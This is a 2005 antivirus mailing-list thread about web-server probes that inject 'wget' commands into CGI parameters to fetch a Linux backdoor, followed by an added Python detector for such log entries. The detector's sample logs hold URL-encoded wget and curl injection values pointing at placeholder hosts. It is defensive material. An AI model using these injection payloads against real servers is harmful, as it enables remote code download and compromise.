On Saturday 05 Nov 2005 14:42, [EMAIL PROTECTED] wrote:
> Hi again everyone,
>
> Got the same thing a few minutes ago, coming from China this time, pointing
> to the same address for the download .... Seems to be spreading? The
> downloaded file is definitely for Linux.

I got caught out by a vulnerability in awstats a few months back; it used the same kind of method: put an executable in /tmp and ran it (somehow). It was being used to run a DDoS attack, controlled by IRC. Once I found it I removed it from /tmp and set the /tmp partition to noexec, upgraded awstats and added a search for 'wget' to my logwatch. Phew!

> Tudor
>
> __________________
>
> Hi everyone,
>
> Last night I caught an attack on my web servers here; the attack consisted
> of command execution attempts using various CGI vulnerabilities. The fact
> is that after looking at the payload of all connection attempts, they all
> had a "wget <IP Address>/lupii", same IP address; I can send it to the
> list if anybody needs it. I downloaded the file from that site, it is an
> ELF executable and it seems to be a backdoor of some sort reporting back
> to the site. The attack was coming from Taiwan and the download site was
> in Norway.
>
> I am not good at looking at ELF format programs, is anybody willing to
> take a look? I can send the file on demand. Does anybody know what
> this is all about?
>
> Thanks,
> Tudor
>
> _______________________________________________
> http://lurker.clamav.net/list/clamav-users.html

--
-----------------
Bob Hutchinson
Midwales dot com
-----------------
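The "search for 'wget'" the poster added to logwatch, and Tudor's observation that every probe carried the same "wget <IP>/lupii" payload, amount to a simple access-log detection. The script below is an added example written for this page, not code from either poster or from logwatch: it parses Apache combined-format lines, URL-decodes the request so that %20 and %7C tricks do not hide the command, and flags requests where a download tool (wget, curl, fetch, lynx) is followed by a host or URL. The log lines are constructed for illustration, using RFC 5737 documentation addresses rather than the real source and download hosts from the thread; the regexes and function names are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format). The
# "lupii" filename is the one reported in the thread; every address is
# from the RFC 5737 documentation ranges, not an attacker host.
SAMPLE_LOG = """\
203.0.113.9 - - [05/Nov/2005:03:12:44 +0000] "GET /cgi-bin/stats.cgi?cfg=%7Cwget%20198.51.100.7%2Flupii%7C HTTP/1.0" 404 221 "-" "Mozilla/4.0"
203.0.113.9 - - [05/Nov/2005:03:12:45 +0000] "GET /cgi-bin/other.pl?arg=%3Bcurl%20-O%20http%3A%2F%2F198.51.100.7%2Flupii HTTP/1.0" 404 221 "-" "Mozilla/4.0"
192.0.2.30 - - [05/Nov/2005:03:13:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.31 - - [05/Nov/2005:03:13:07 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a
# combined-format line; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A download tool, optional flags, then a bare IP or a hostname, with
# an optional http(s):// scheme. Requiring whitespace after the tool
# name keeps a path such as /docs/wget-manual.html from matching.
FETCH_RE = re.compile(
    r'\b(?P<tool>wget|curl|fetch|lynx)\b[^&;|]*?\s+(?:-\S+\s+)*'
    r'(?:https?://)?(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[\w.-]+\.[A-Za-z]{2,})'
)


def parse_line(line):
    """Return the parsed fields of one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode once so percent-encoded spaces, pipes and slashes are visible.
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def find_fetch_attempts(log_text):
    """Return one dict per request whose decoded target contains a
    download-tool invocation pointing at a host or URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = FETCH_RE.search(rec["decoded"])
        if m:
            hits.append({
                "ip": rec["ip"],
                "status": rec["status"],
                "tool": m.group("tool"),
                "host": m.group("host"),
                "request": rec["decoded"],
            })
    return hits


def sources_by_download_host(hits):
    """Group attacking IPs by the host they try to download from: the
    thread's point that many probes shared one download site makes
    that host the useful pivot for blocking and for hunting."""
    grouped = {}
    for h in hits:
        grouped.setdefault(h["host"], set()).add(h["ip"])
    return grouped


if __name__ == "__main__":
    found = find_fetch_attempts(SAMPLE_LOG)
    for h in found:
        print(f"{h['ip']} -> {h['tool']} from {h['host']} (HTTP {h['status']}): {h['request']}")
    print(sources_by_download_host(found))
```

A 404 on such a request means the probed script was not present; a 200 from a CGI path with this payload is what deserves an immediate look in /tmp and the process list. The noexec mount the poster applied to /tmp is a mount option in /etc/fstab and is a separate control from this detection; it stops the dropped file from being executed directly but not a payload run through an interpreter.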